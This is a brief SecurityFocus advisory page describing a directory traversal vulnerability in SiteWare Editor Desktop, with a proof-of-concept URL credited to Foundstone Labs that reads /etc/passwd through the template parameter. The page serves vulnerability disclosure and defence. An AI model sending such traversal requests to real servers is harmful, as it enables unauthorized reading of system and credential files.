SiteWare Editor Desktop Directory Traversal Vulnerability

An example was provided by Foundstone Labs <labs@foundstone.com>:


From a browser, make the following URL request:

http://server:port/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus